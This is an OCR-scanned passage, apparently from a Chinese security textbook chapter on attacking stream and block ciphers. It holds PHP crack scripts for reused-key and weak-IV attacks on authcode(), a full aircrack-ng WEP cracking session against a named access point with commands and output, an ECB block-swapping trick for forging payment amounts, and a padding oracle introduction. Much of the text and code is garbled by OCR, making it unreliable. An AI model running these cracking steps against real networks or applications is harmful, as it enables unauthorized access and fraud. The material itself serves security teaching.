$tmp p = substr(Scipher | Pr 26); 
echo hex(Stmp. | p)."<br>" 
$tmp_t = substr($cipher t, 26); 


echo hex($tmp_t)."<br>"; 
for ($i=0;$i<strlen($plain) ; $i++) { 
$target .= chr(ord($plain[$i]) ^ 
pce ^ ord($tmp t[$i])); 


return $target; 
} 
function authcode($string, $operation = 
'DECODE', $key = '', $expiry = 0) { 
//$ckey_length = 4; 

ckey_length = 0; 

key = md5($key ? $key : UC_KEY); 


keya = md5(substr($key, 0, 16)); 
keyb = md5(substr($key, 16, 16)); 
keyc = $ckey_length ? ($operation == 


'DECODE' ? substr($string, 0, $ckey_length): 
substr(md5(microtime()), -$ckey_length) ) 


rte 
' 


cryptkey = $keya.md5($keya.$keyc); 
key_length = strlen($cryptkey); 
string = $operation == 'DECODE' ? 
base64_decode(substr($string, 
$ckey_length) ) 
sprintf('%010d', $expiry ? $expiry + 
time() : 0).substr(md5($string.$keyb), 0, 
16).$string; 
string length = strlen($string); 
result = ''; 
box = range(0, 255); 
rndkey = array(); 
for($i = 0; $i <= 255; $i++) { 
rndkey[$i] = ord($cryptkey[$i % 
$key_length]); 

l 


for($j = $i = 0; $i < 256; $i++) { 
j = ($j + $box[$i] + $rndkey[$i]) % 
256; 
tmp - $box[$i]; 
box[$i] = $box[$j]; 
box[$j] = $tmp; 
J 
$xx = ''; // real key 


for($a = $j = $i = 0; $i < 
$string_length; $i++) { 


a = ($a + 1) % 256; 

j = ($j + $box[$a]) % 256; 
tmp = $box[$a]; 

box[$a] = $box[$j]; 
box[$j] = $tmp; 

xx .= chr($box[($box[$a] + 


$box[$j]) % 256]); 
result .= chr(ord($string[$i]) ^ 
($box[($box[$a] + $box[$j]) % 256])); 

} 


echo "xor key is: ".hex($xx)."«br2"; 
if($operation == 'DECODE') { 
if((substr($result, 0, 10) == 0 || 
substr($result, 0, 10) - time() > 0) && 
substr($result, 10, 16) == 
substr(md5(substr($result, 26).$keyb), 0, 


16)) ( 
return substr($result, 26); 
} else { 
return ''; 
} 
} else { 


return $keyc.str_replace('=', š 
base64_encode($result)); 
3 
} 


?> 


结果 如 下 : 


€ Q O www. a. con/test2. php 


plaintextl is: aaaabbbb 

plaintext2 is: ccccbbbb 

xor key is: 
\x134\x5\x163\x45\x248\x83\x250\x98\x222\x29\ x229\ x1 46\x246\x94\x76\x115\x35\x1 
Cipherl is: 
\x182\x53\x147\x29\x200\x99\x202\x82\x238\ x45 \x220\x171\x192\x107\x125\x65\x20) 


xor key is: 
\x134\x5\x163\x45\x248\x83\x250\x98\x222\x29\x229\ x1 46\x246\x94\x76\x115\x35\x1 
Cipher2 is: 
\x182\x53\x147\x29\x200\x99\x202\x82\x238\x%45\x211 \x165\x149\x109\x116\x22\x%70\ 


\x227\x42\x31\x204\%251\x24\x114\x89 
\%225\x40\x29\x%206\x251\x24\x114\x89 
crack result is :ccccbbbb 


输入 的 明文 1 是 “aaaabbbb”， 明 文 2 是 “cc-ccbbbb”。 


caua 分 别 得 到 了 两 个 密 文 Cipher1 与 Cipher2。 根 据 算 
法 ， 密 文 前 10 位 用 于 验证 时 间 ，10 到 26 位 用 于 验证 完整 性 ， 因 此 真正 
的 密 文 是 从 第 27 位 开始 的 在 此 分 别 如 下 : 


WEC2TWEM ee a Tua 142829 
rwn Ns ^a2 beth 2811439 


根据 之 前 Bi 的 公 SEU 


E(A) xor E(B) = A xor B 


已 知 任意 3 个 值 即 可 推算 出 剩 下 的 一 个 值 ， 因 此 有 : 


aaaabbbb XOR 
*\X227\Xx42\x31\x204\x251\x24\x114\x89” XOR 
‘\X225\x40\x29\x206\x251\x24\ 

X114Nx89' = ccccbbbb 


MITER h THX 9 3x ERE TEcrackQ EN S FP fet: 


dodo crack($plain, $cipher_p, $cipher_t){ 
t 


arge 
$len - strlen($plain); 
$tmp p - Vd rv AME -p, 26); 
echo hex($tmp_p)." 
$tmp t - substr (cipher t, 26); 
echo hex(Stmp. t).' br»" 
for ($i-0; jS1estrlen(splin); $i++){ 
$tar rget .= chr(ord($plain[$i]) ^ 
ord($tmp_p[$i]) ^ ord($tmp_t[$i])); 


return $target; 


这 里 之 所 以 能 攻击 成 功 ， ee 
用 的 密 钥 相同 ， 因 此 我 们 才能 通过 XOR 运 算 还 原 出 明文 ， 形 成 Reused 
KeyAttack ° 


一 次 加 密 时 的 key: 


xor key is: 
Ax134Nx5NAx163X x45 x248Nx83Xx250Xx98Nx222Xx29Nx229Nx146 x246 x 94 x T6x11 5x35 x12 
Cipherl is: 
Ax1823x53 x14 7x29 x200 x99 x202x82Xx238xd5Nx220x171x192Xx107Xx125x 65x20 x62 


TB UXORIS Akey: 
xor key is: 
\x134\x5\x163\x45\x248\x83\x250\x98\x222\ x29) x229\ x1 46 \x246\ x94 Xx T6N x11 5Nx35Xx12x232 


Cipher? is: 
Ax182Xx53x147X x29 x200x99x202Xx82Nx238 x45 \ x21 1x165)x149\x109\x116\x22\x70\x53\x1 


但 如 果 存 在 初始 化 回 量 ， 则 相同 明文 每 次 加 密 的 结果 均 不 同 ， 将 增加 

破解 的 难度 ， 即 不 受 此 攻击 影响 。 因 此 当 : 

D (这 也 是 默认 值 ) ，authcode() 将 产生 随机 密 钥 ， 算 法 的 强度 也 就 增 
IT ° 

但 如 果 IV 不 够 随机 ， 攻 击 者 有 可 能 找到 相同 的 IV， 则 在 相同 IV 的 情况 
下 仍然 可 以 实施 “Reused Key Attack" ° ZE*WEPBEE"— D rp, oed 
了 相同 的 IV， 从 而 使 得 攻击 成 功 。 


11.2.2 Bit-flipping Attack 

再 次 回 到 公式 上 来 : 

由 此 可 以 得 出 : 

这 意味 着 当知 道 A 的 明文 、B 的 明文 、A 的 密 文 时 ， 可 以 推导 出 B 的 密 
文 。 这 在 实际 应 用 中 非常 有 用 。 

比如 一 个 网 站 应 用 ， 使 用 Cookie 作 为 用 户 号 份 的 认证 凭证 ， 而 Cookie 的 
值 是 通过 XOR 加 密 而 得 的 。 认 证 的 过 程 束 是 服务 絮 端 解密 Cookie 后 ， 
检 EHER Ai 。 假设 明文 是 : 

那么 当 攻击 者 注册 了 一 个 普通 用 户 A 时 ， 获 取 了 人 A 的 Cookie 为 
Cookie(A), WA TR 构造 出 管理 员 的 Cookie， 从 而 获得 管理 员 权 限 ; 


Kate ah ie xor Cookie(A) x 
(admin_account+manager) = i okie(a adi in) 


在 黎 码 学 中 ， 攻 击 者 在 不 知道 明文 的 情况 下 ， 通 过 改变 冤 文 ， 使 得 明 
文 按 其 需要 的 方式 发 生 改 变 的 攻击 方式 ， 被 称 为 Bit- flipping Attack ° 
fi Bit-flipping WG AN FE IE CASE, RES JI 
带 有 KEY 的 MAC (Ñ EUEN, Message Authentication Code) ， 通 过 
MACH UER Me KEL © 


MAC 的 防 自 改 原理 图 
通过 哈 希 算法 来 实现 的 MAC， 称 为 HMAC 。HMAC 由 于 其 性 能 较 好 ， 
而 被 广泛 使 用 。 如 下 图 所 示 为 HMAC 的 一 种 实现 。 


SHA1-1st pass 


SHA1-2nd pass 


HMAC 的 实现 过 程 

在 authcode() 中 ， 其 实 已 经 实现 了 HMAC， 所 以 攻击 者 在 不 知晓 加 密 
KEY 的 情况 下 ， 是 无 法 完成 Bit-flipping 攻 击 的。 

注意 这 段 代 码 : 


if($operation == 'DECODE') 
if((substr($result, 0, 10) == 0 || 
substr($result, 0, 10) - time() > 0) && 
substr($result, 
10, 16) == substr(md5(substr($result, 26). 
Skeyb), ©, 16)) { 
return substr($result, 26); 
} else { 
return ''; 
3 


其 中 ， 密 文 的 前 10 个 字 节 用 于 验证 时 间 是否 有 效 ，10~26 个 字 节 即 为 
HMAC， 用 于 验证 密 文 是 否 被 自 改 ，26 个 字 字 之 后 才 是 真正 的 密 文 。 
HMAC 由 以 下 代码 实现 : 

这 个 值 与 两 个 因素 有 关 ， 一 个 是 真正 的 密 文 :substr($result, 26); 一 个 
是 $keyb ， 而 $keyb 又 是 由 加 密 密 钥 KEY 变 化 得 到 的 ， 因 此 在 不 知晓 
KEY 的 情况 下 ， 这 个 HMAC 的 值 是 无 法 伪造 出 来 的 。 因 此 HMAC 有 效 
地 保证 了 密 文 不 会 被 车 改 。 


11.2.3 ” 弱 随 机 IV 问 题 

在 authcode() 画 数 中 ， 它 默认 使 用 了 4 字 节 的 IV (就 是 函数 中 的 
keyc) ， 使 得 破解 难度 增 大 。 但 其 实 4 字 节 的 IV 是 很 脆弱 的 ， 它 不 够 随 
机 ， 我 们 完全 可 以 通过 “暴力 破解 ”的 方式 找到 重复 的 IV。 为 了 验证 这 
一 点 ， 调 整 一 下 破解 程序 ， 如 下 : 


«?php 
define('UC KEY','aaaaaaaaaaaaaaaaaaaaaaaaaaa' 
); 
$plaintext1 "aaaabbbbxxxx" ; 
$plaintext2 "ccccbbbbcccc"; 
$guess result - ""; 
$time start = time(); 
$dict - array(); 
global $ckey length; 
$ckey length - 4; 
echo "Collecting Dictionary(XOR Keys).\n"; 
$cipher2 = authcode($plaintext2, "ENCODE" , 
UC_KEY); 
$counter = 0; 
for (;;)t 
$counter ++; 
$cipher1 = authcode($plaintext1, 
"ENCODE" , UC_KEY); 
$keyc1 = substr($cipher1, 0, $ckey_length); 
$cipher1 = base64_decode(substr($cipher1, 
$ckey length)); 
$dict[$keyc1] = $cipher1; 
if ( $counter%1000 == 0){ 
echo "."; 
if ($guess result - guess($dict, 
$cipher2) ){ 
break; 


} 


} 
} 
array unique($dict); 
echo "\nDictionary Collecting Finished..n"; 
echo "Collected ".count($dict)." XOR Keys\n"; 
function guess($dict, $cipher2){ 
global $plaintext1, $ckey_length; 
$keyc2 = substr($cipher2, 0, $ckey_length); 
$cipher2 = base64_decode(substr($cipher2, 
$ckey_length) ); 
for ($i-0; $i<count($dict); $i++){ 
if (array_key_exists($keyc2, $dict)){ 
echo "\nFound key in dictionary!\n"; 
echo "keyc is: ".$keyc2."\n"; 
return crack($plaintext1, $dict[$keyc2], 
$cipher2) ; 
break; 
} 
} 
return False; 


echo "\ncounter is:".$counter."\n"; 
$time_spend = time() - $time_start; 
echo "crack time is: ".$time_spend." seconds 
\n"; 
echo "crack result is :".$guess_result."\n"; 
function crack($plain, $cipher_p, $cipher_t){ 

$target = ''; 

$tmp_p = substr($cipher_p, 26); 

//echo hex($tmp_p)."\n"; 

$tmp_t = substr($cipher_t, 26); 

//echo hex($tmp_t)."\n"; 

for ($i=0;$i<strlen($plain) ; $i++) { 

$target .= chr(ord($plain[$i]) ^ 

ord($tmp_p[$i]) ^ ord($tmp_t[$i])); 

} 


return $target; 


} 
function hex($str){ 
$result = ''; 
for ($i=0;$i<strlen($str) ; $i++) { 
$result .= "\\x".ord($str[$i]); 
} 


return $result; 
} 
function authcode($string, $operation = 
'DECODE', $key = '', $expiry = 0) { 
global $ckey_length; 
//$ckey_length = 0; 
$key = md5($key ? $key : UC KEY); 
$keya = md5(substr($key, 0, 16)); 
$keyb = md5(substr($key, 16, 16)); 
$keyc = $ckey length ? ($operation == 


'DECODE' ? substr($string, 0, $ckey length): 
substr(md5(microtime()), -$ckey length)) : 


$cryptkey = $keya.md5($keya.$keyc); 

$key length = strlen($cryptkey); 

$string - $operation -- 'DECODE' ? 
base64_decode(substr($string, 
$ckey_length)) : 
sprintf('%010d', $expiry ? $expiry + 
time() : 0).substr(md5($string.$keyb), 0, 
16).$string; 

$string_length = strlen($string); 

$result = ''; 

$box = range(0, 255); 

$rndkey = array(); 
for($i = 0; $i <= 255; $i++) { 
$rndkey[$i] = ord($cryptkey[$i % 

$key_length]); 


} 
for($j 
$j 


= $i = 0; $i < 256; $i++) { 
= ($j + $box[$i] + $rndkey[$i]) % 
256; 

$tmp = $box[$i]; 

$box[$i] = $box[$j]; 
substr($result, 10, 16) == 
substr(md5(substr($result, 26).$keyb), 0, 


16)) { 
return substr($result, 26); 
) else { 
return ''; 
} 
} else { 


return $keyc.str_replace('=', '', 
base64_encode($result) ); 


} 
} 
?> 


M 


运行 结果 如 下 : 
在 大 约 16 秒 后 ， 共 允 历 了 19295 个 不 同 的 XOR KEY， 找 到 了 相同 的 
IV， 顺 利 破 解 出 明文 。 


11.3 ”WEP 破解 

流 密 码 加 窗 算 法 存在 “Reused Key Attack” 和 “Bit-flipping Attack” 等 攻击 
方式 。 而 在 现实 中 ， 一 种 最 著名 的 针对 流 密 码 的 攻击 可 能 就 是 WEP 密 
钥 的 破解 。WEP 是 一 种 常用 的 无 线 加 密 传 输 协 议 ， 破 解 了 WEP 的 密 
铀 ， 束 可 以 以 此 密 钥 连接 无 线 的 Access Point。WEP 采 用 RC4 算 法 ， 也 
存在 这 两 种 攻击 方式 。 


| x| 
PRES 选择 无 线 网 络 


型 刷新 闻 络 列表 单 击 以 下 列表 中 的 项 目 以 连接 到 区 域内 的 无 线 网 络 或 获得 更 多 信息 也 )。 


、 AIIS-HONE — 


5B ^ 


à) 了 解 无 线 网 络 


dg 更 改 首选 网 络 的 顺序 


zy BREE 


EFF D | 


Windows 操 作 系统 连接 无 线 网 络 的 选项 


WEP 在 加 密 过 程 中 ， 有 两 个 关键 因素 ， 一 个 是 初始 化 向 量 IV， 一 个 是 
对 消息 的 CRC-32 校 验 。 而 这 两 者 都 可 以 通过 一 些 方法 克服 。 

IV 以 明文 的 形式 发 送 ， 在 WEP 中 采用 24bit 的 [TV， 但 这 其 实 不 是 很 大 的 
一 个 值 。 假 设 一 个 繁忙 的 AP， 以 11Mbps 的 速度 发 送 大 小 为 1500bytes 的 
包 ， 则 15008/(1110^6)*2^24 = ~18000 秒 ， 约 为 5 个 小 时 。 因 此 最 多 5 个 
小 时 ，IV 就 将 耗 光 ， 不 得 不 开始 出 现 重复 的 IV。 在 实际 情况 中 ， 并 非 
每 个 包 都 有 1500bytes 大 小 ， 因 此 时 间 会 更 短 。 

IV 一 旦 开始 重复 ， 就 会 使 得 “Reused Key At-tack” 成 为 可 能 。 同 时 通过 
收集 大 量 的 数据 包 ， 找 到 相同 的 IV， 构 造 出 相同 的 CRC-32 校 验 值 ， 也 


可 以 成 功 实施 “Bit-flipping Attack" ° 

2001 年 8 月 ， 破 解 WEP 的 理论 变 得 可 行 了 。Berkly 的 Nikita Borisov, Ian 
Goldberg 以 及 David Wagner 共同 完成 了 一 篇 很 好 的 论文 : “Se-curity of 
the WEP algorithm”， 其 中 深入 前 述 了 人 WEP 破解 的 理论 基础 。 


实际 破解 WEP 的 步 又 要 稍微 复杂 一 些 ，Air-crack 实 现 了 这 一 过 程 。 
第 一 步 : 加 载 目标 。 


root@segfault:/home/cg/eric-g# airodump-ng -- 
bssid 00:18:F8:F4:CF:E4 -c 9 ath2 -w eric-g 
CH 9 ][ Elapsed: 4 mins ][ 2007-11-21 23:08 
BSSID PWR RXQ Beacons Data, #/s CH MB ENC 
CIPHER AUTH ESSID 

00:18:F8:F4:CF:E4 21 21 2428 26251 0 9 48 
WEP WEP OPN eric-G 

BSSID STATION PWR Lost Packets Probes 
00:18:F8:F4:CF:E4 06:19:7E:8E:72:87 23 0 
34189 


第 二 步 : 与 目标 网 络 进行 协商 。 


rootQsegfault:/home/cg/eric-g£ aireplay-ng 
-1 600 -e eric-G -a 00:18:F8:F4:CF:E4 -h 
06:19:7E:8E:72:87 ath2 

22:53:23 Waiting for beacon frame (BSSID: 
00:18:F8:F4:CF:E4) 

22:53:23 Sending Authentication Request 
22:53:23 Authentication successful 
22:53:23 Sending Association Request 
22:53:24 Association successful :-) 
22:53:39 Sending keep-alive packet 
22:53:54 Sending keep-alive packet 
22:54:09 Sending keep-alive packet 
22:54:24 Sending keep-alive packet 
22:54:39 Sending keep-alive packet 
22:54:54 Sending keep-alive packet 
22:55:09 Sending keep-alive packet 
22:55:24 Sending keep-alive packet 
22:55:39 Sending keep-alive packet 
22:55:54 Sending keep-alive packet 
22:55:54 Got a deauthentication packet! 
22:55:57 Sending Authentication Request 
22:55:59 Sending Authentication Request 
22:55:59 Authentication successful 
22:55:59 Sending Association Request 
22:55:59 Association successful :-) 
22:56:14 Sending keep-alive packet 
***KEEP THAT RUNNING 


root@segfault:/home/cg/eric-g# aireplay-ng 
-5 -b 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 
ath2 

22:59:41 Waiting for a data packet... 

Read 873 packets... 

Size: 352, FromDS: 1, ToDS: © (WEP) 

BSSID = 00:18:F8:F4:CF:E4 

Dest. MAC - 01:00:5E:7F:FF:FA 

Source MAC = 00:18:F8:F4:CF:E2 

0x0000: 0842 0000 0100 5e7f fffa 0018 f8f4 
CREA .BolocA iustis 

0x0010: 0018 f8f4 cfe2 cOb5 121a 4600 0e18 
Of9d c 1 ET SE Fi... 

0x0020: bd80 8c41 de34 0437 8d2d c97f 2447 
3d81 ...A.4.7.-.$G-. 

0x0030: 9bdc 68da 06b2 18be 9cd6 9cb4 9443 


07250 0 C.% 
0x0040: 87f6 9a14 1ff9 Ocfa bd36 862e ec54 
T2415 es aA fe 
0x0050: 335b 4a91 d6a4 caae 5a58 a736 6230 
87d9 3[J..... ZX.6b0.. 
0x0060: 4e14 7617 21c6 eda4 9b0d 3a00 Ob4f 
47ab N.v.!.....:..06. 
0x0070: a529 dedf 4c13 880c ale6 37f7 50e6 
599c .)..L..... 7.P.Y. 


0x0080: Qa4c 0b7f 24ae b019 ef2f 36b9 c499 
8643 .L.$..../6....C 
0x0090: 6592 5835 23e5 c8e9 dib9 3d36 1fe5 
ecfe e.X5#..... =6.... 
0x00a0: 510b 5iba 4fe4 e2ed d33b 0459 ca68 
82b8 Q.Q.0....;.Y.h.. 
0x00b0: c856 ea70 829f c753 1614 290e d051 


392f .V.p...S..)..Q9/ 
0x00cO: fa65 cbc6 c5f8 24b1 cdbd 94e5 08c3 


2dd4 ete. Suisses -. 

0x00d0: 6e4b 983b dc82 b2cd b3f1 dab5 b816 
6188: Ke esl a. 

--- CUT --- 


Use this packet ? y 

Saving chosen packet in 
replay_src-1121-230028.cap 

23:00:38 Data packet found! 

23:00:38 Sending fragmented packet 
23:00:38 Got RELAYED packet! ! 
23:00:38 Thats our ARP packet! 
23:00:38 Trying to get 384 bytes of a 
keystream 
23:00:38 Got RELAYED packet!! 

23:00:38 Thats our ARP packet! 
23:00:38 Trying to get 1500 bytes of a 
keystream 
23:00:38 Got RELAYED packet!! 

23:00:38 Thats our ARP packet! 

Saving keystream in fragment-1121-230038.xor 
Now you can build a packet with packetforge- 
ng out of that 1500 bytes keystream 


第 四 步 : 构造 ARP 包 。 


ZI 


E 


rootQsegfault:/home/cg/eric-g& packetforge- 
ng -0 -a 00:18:F8:F4:CF:E4 -h 
06:19:7E:8E:72:87 -k 255.255.255.255 -1 
255.255.255.255 -w arp -y *.xor 

Wrote packet to: arp 


TU: 生成 目 己 的 ARP 包 。 


root@segfault:/home/cg/eric-g# aireplay-ng 
-2 -r arp -x 150 ath2 

Size: 68, FromDS: 0, ToDS: 1 (WEP) 

BSSID = 00:18:F8:F4:CF:E4 

Dest. MAC - FF:FF:FF:FF:FF:FF 

Source MAC - 06:19:7E:8E:72:87 

0x0000: 0841 0201 0018 f8f4 cfe4 0619 7e8e 


(280. A OR an 
0x0010: ffff ffff ffff 8001 1f1a 4600 c9d3 
OSET eoi xx Es Suse 
0x0020: d65a 6a63 0b51 bb60 8390 a8b4 947d 
456f .Zjc.Q.^..... }EO 
0x0030: 3a05 25b2 7464 7db7 c49b d38a f789 
8226 2496. Ed] » oos P 


0x0040: 83a8 93c5 .... 

Use this packet ? y 

Saving chosen packet in 
replay src-1121-230224.cap 


第 六 步 : 开始 破解 。 


最 终 成 功 破 解 册 WEP 的 KEY， 可 以 免费 蹄 网 了 


cgüsegfault:-/eric-g$ aircrack-ng -z eric- 
g-05.cap 

Opening eric-g-05.cap 

Read 64282 packets. 

4 BSSID ESSID Encryption 

1 00:18:F8:F4:CF:E4 eric-G WEP (21102 IVs) 
Choosing first network as target. 

Attack will be restarted every 5000 captured 
ivs. 

Starting PTW attack with 21397 ivs. 
Aircrack-ng 0.9.1 

[00:00:11] Tested 78120/140000 keys (got 
22918 IVs) 

KB depth byte(vote) 

0 3/ 5 34( 111) 70( 109) 42( 107) 2C( 106) 
B9( 106) E3( 106) 

1 1/ 14 34( 115) 92( 110) 35( 109) 53( 109) 
33( 108) CD( 107) 

2 6/ 18 91( 114) E7( 114) 21( 111) OE( 110) 
88( 109) C6( 109) 

3 2/ 31 37( 109) 80( 109) 5F( 108) 92( 108) 
9E( 108) 9B( 107) 

4 0/ 2 29( 129) 55( 114) AD( 112) 6A( 111) 
BB( 110) C1( 110) 

KEY FOUND! [ 70:34:91:37:29 ] 

Decrypted correctly: 100% 


114 ECB 模 式 的 缺陷 

前 面 讲 到 了 流 密码 加 密 算法 中 的 几 种 常见 的 攻击 方法 ， 在 分 组 加 密 算 
法 中 ， 也 有 一 些 可 能 被 攻击 者 利用 的 地 方 。 如 果 开 发 者 不 熟悉 这 些 问 
题 ， 就 有 可 能 错误 地 使 用 加 密 算法 ， 导 致 安全 隐患 。 

对 于 分 组 加 密 算法 来 说 ， 除 去 算法 本 身 ， 还 有 一 些 通 用 的 加 密 模 式 ， 
不 同 的 加 密 算 法 会 文 持 同样 的 几 种 加 密 模式 。 常 见 的 加 密 模式 有 : 
ECB、CBC、CFB、OFB、CTR 等 。 如 果 加 密 模式 被 攻击 ， 那 么 不 论 加 
密 算法 的 密 铀 有 多 长 ， 都 可 能 不 再 安全 。 

ECB 模 式 〈 电 码 短 模式 ) 是 最 简单 的 一 种 加 密 模 式 ， 它 的 每 个 分 组 之 
间 相 对 独立 ， 其 加 密 过 程 如 下 : 


Plaintext Plaintext Plaintext 
Fr COOL COOOL 
T 1 T 
Block Cipher Block Cipher Block Cipher 
Key —— Encryption Key 一 一 | Encryption Key —- Encryption 
Y ' ' 
LELLLLM E 图 HE LLILLLIT] 
Cipherte xt Ciphertext Ciphertext 


Electronic Codebook (ECB) mode encryption 


但 ECB 模 式 最 大 的 问题 也 是 出 在 这 种 分 组 的 独立 性 上 : 攻击 者 只 需要 
d 在 经 过 解密 后 ， 所 得 明文 的 顺序 也 是 经 过 对 调 


—— 


ECB 模 式 可 以 交换 密 文 或 明文 的 顺序 
验证 如 下 : 


ecb mode.py: 
from Crypto.Cipher import DES3 
import binascii 
def hex s(str): 
rec Ti 
for i in range(0,len(str)): 
re += "\\x"+binascii.b2a_hex(str[i]) 
return re 
key = '1234567812345678' 
plain = 'aaaabbbbaaaabbbb' 
plain1 = 'xaaabbbbaaaabbbb' 
plain2 = 'aaaabbbbxaaabbbb' 
o = DES3.new(key, 1) # arg[1] == 1 means ECB 


print "1 : "«hex s(o.encrypt(plain)) 
print "2 : "+hex_s(o.encrypt(plain1) ) 
print "3 : "«hex s(o.encrypt(plain2)) 


分 别 对 三 段 明文 执行 3-DES 加 密 ， 所 得 结果 如 下 : 


[root@vps tmp]#python ecb mode.py 

1 : \xab\xf1\x3a\x33\x59\x35\x3b\x07\xab 
NXfANX3aNX33NX59NX85NX3bNX07 

2 : \x32\xd1\xe9\x5a\x49\x0Ff\xfe\x80\xab 
NXfANX3aNX33NX59NX35NX3bNX07 

8 : \xab\xf1\x3a\x33\x59\x35\x3b 
NX07NX32NxdiNxe9 Nx5aNx49Nx0f Nx feNx80 


自 完 看 看 plain 的 值 : 


3-DES 每 个 分 组 为 8 个 字 市 ， 因 此 明文 会 被 分 为 两 组 : 


plain] SZ BAR SCN: 


\xab\xf1\x3a\x33\x59\x35\x3b\x07\xab\xf1\x3a 
\x33\x59\x35\x3b\x07 


将 其 密 文 分 为 两 组 

将 其 窗 AJ JY PN ZH.: 
\xab\xf4\x3a\x33\x59\x35\x3b\x07 
\xab\xf4\x3a\x33\x59\x35\x3b\x07 


可 见 同样 的 明文 经 过 加 密 后 得 到 了 同样 的 密 文 。 
再 看 看 plain1， 它 与 plain 只 在 第 一 个 字 节 上 存在 差异 : 


xaaabbbb 
aaaabbbb 


加 密 后 的 密 文 为 : 


\x32\xd1\xe9\x5a\x49\x0f\xfe\x80 
\xab\xf1\x3a\x33\x59\x35\x3b\x07 


对 比 plain 加 密 后 的 密 文 ， 可 以 看 到 ， 仅 仅 block 1 的 密 文 不 同 ， 而 block 
2 的 密 文 是 完全 一 样 的 。 也 就 是 说 ，block 1 并 未 影响 到 block 2 的 结果 。 
这 与 链 式 加 密 模式 (CBC) 等 是 完全 不 同 的 ， 链 式 加 密 模式 的 分 组 前 
后 之 间 会 互相 关联 ， 一 个 字 市 的 变化 ， 会 导致 整个 密 文 发 生变 化 。 这 
一 特点 也 可 以 用 于 判断 密 文 是 否 是 用 ECB 模 式 加 密 的 。 

再 看 看 plain2， 按 照 分 组 来 看 ， 它 是 plain1 对 调 了 两 个 分 组 的 结果 : 


aaaabbbb 
xaaabbbb 


plain2 加 密 后 的 密 文 ， 其 结果 也 正定 plain1 的 密 文 对 调 分 组 密 文 的 绪 
m. 


\xab\xf1\x3a\x33\x59\x35\x3b\x07 
\x32\xd1\xe9\x5a\x49\x0f\xfe\x80 


因此 验证 了 之 前 的 结论 : 对 于 ECB 模 式 来 说 ， 改 变 分 组 密 文 的 顺序 ， 
将 改变 解密 后 的 明文 顺序 ;， 赫 换 某 个 分 组 密 文 ， 解 密 后 该 对 应 分 组 的 
明文 也 会 被 猴 换 ， 而 其 他 分 组 不 受 影响 。 

II 


member=abc | | pay=10000.00 


PALER EWA: 

这 正好 是 一 个 或 两 个 分 组 的 长 度 因此 攻击 者 只 需要 使 用 “1.00” 的 密 
文 ， 蔡 换 “10000.00” 的 密 文 ， 即 可 伪造 支付 金额 从 10000 元 至 1 元 。 在 实 
际 攻击 中 ， Aeri E H Eni s SPICE — 六 1 元 物品 ， 来 获取 1.00 的 密 
文 ， 这 并 非 一 件 很 困难 的 事情 
ECBECABTBAEE 并 非 某 个 加 密 算 法 的 问题 ， 因 此 即使 强壮 如 AES-256 
等 算法 ， 只 要 使 用 了 ECB 模 式 ， 也 无 法 避免 此 问题 。 此 外 ，ECB 模 式 
仍然 会 带 有 明文 的 统计 特征 ， 因此 在 分 组 较 多 的 情况 下 ， 其 私密 性 也 
会 存在 一 些 问 题 ， 如 下 : 


plaintext ECB chained modes 

ECB 模 式 与 CBC 模 式 的 对 比 效果 

ECB 模 式 并 未 完全 混 消 分 组 间 的 关系 ， 因 此 当 分 组 足够 多 时 ， 仍 然 会 
骏 露 一 些 私密 信息 ， 而 链 式 模式 则 避免 了 此 问题 。 

当 需 要 加 密 的 明文 多 于 一 个 分 组 的 长 度 时 ， 应 该 避免 使 用 ECB 模 式 ， 
而 使 用 其 他 更 加 安全 的 加 密 模式 。 


11.5 Padding Oracle Attack 

f£ Eurocrypt 2002 KS E, Vaudenay #24 T EXT CBC ES C AY “Padding 
Oracle Attack”。 它 可 以 在 不 知道 密 钥 的 情况 下 ， 通 过 对 padding bytes 的 
尝试， 还原 明文 ， 或 者 构造 出 任意 明文 的 密 文 。 

在 2010 年 的 BlackHat 欧 洲 大 会 上 ，yJulianoRizzo 与 Thai Duong 介绍 
T “Padding Oracle" 在 实际 中 的 攻击 和 案例， 并 公布 了 ASPNET 存 在 的 
Padding Oracle 问 题 。 在 2011 年 的 Pwnie Re-wards 中 ，ASPNET 的 这 个 漏 
洞 被 评 为 “最 具 价值 鸭 服务 圳 端 漏洞 ”。 

下 面 来 看 看 Padding Oracle 的 原理 ， 在 此 以 DES 为 例 。 

分 组 加 密 算 法 在 实现 加 /解密 时 ， 需 要 把 消息 进行 分 组 (block) , block 
的 大 小 常见 的 有 64bit、128bit、256bit 等 。 以 CBC 模 式 为 例 ， 其 实现 加 
密 的 过 程 大 致 如 下 : 


Plaintext Plaintext Plaintext 
[ITTTTTTÀ LITITITT] CNN 


i i i 
wc Ee] | tw » Em] [Ee 


| 


[ITITIIITI LOTIT] LITT TTI 


Ciphertext Ciphertext Ciphertext 


在 这 个 过 程 中 ， 如 果 最 后 一 个 分 组 的 消息 长 度 没 有 达到 block 的 大 小 ， 
则 需要 填充 一 些 字 节 ， 被 称 为 padding。 以 8 个 字 节 一 个 block 为 例 ; 

比如 明文 是 FIG ， 长 度 为 3 个 字 和 有 ， 则 剩 下 5 个 字 万 被 填充 了 
0x05,0x05,0x05,0x05,0x05 这 5 个 相同 的 字 节 ， 每 个 字 节 的 值 等 于 需要 填 
充 的 字 节 长 度 。 如 果 明 文 长 度 刚好 为 8 个 字 节 ， 如 : PLAN-TAIN， 则 后 
面 需 要 填充 8 个 字 节 的 padding， 其 值 为 0x08。 这 种 填充 方法 ， 遵 循 的 是 
最 常见 的 PKCS#5 标 准 。 


BLOCK #1 BLOCK #2 


,| | 
EL LI TL gi. 


| BE aaeeea L1] | | | | [|j 
| mme [x x | | LLLI LLLI] 


- BOSCO saan 
[mme [ei well | — | | | | j| | 


ee 
fs cS | 


EE ENUICTICIEIESEIESETERERERESIENIEN INN 
| ^ B ceat as cg d d 


PKCS#5 填 充 效果 示意 图 
假设 明文 为 : 


BRIAN; 12;2; 


经 过 DES 加 密 〈CBC 模 式 ) 后 ， 其 密 文 为 : 


7B216A634951170FF851D6CC68FC9537858795A28ED4A 
AC6 


密 文 采用 了 ASCII 十 六 进 制 的 表示 方法 ， 即 两 个 字符 表示 一 个 字 市 的 十 
六 进 制 数 。 将 密 文 进行 分 组 ， 密 文 的 前 8 位 为 初始 化 癌 量 IV。 


INITIALIZATION YECTOR BLOCK 1 of 2 BLOCK 2 of 2 


1 2 3 4 5 6 7 B 1 2 3 
"Ow [|= | ls | = [ss a] 


5 6 7 8 


5 1 E! 
Perel | 


H 
LLL 
CS nd LE THE ERESERERERERCICICI 
enger pex [eer [e [oc [o [sr [a [or aw [a o [rw [o [s [nr o [n 


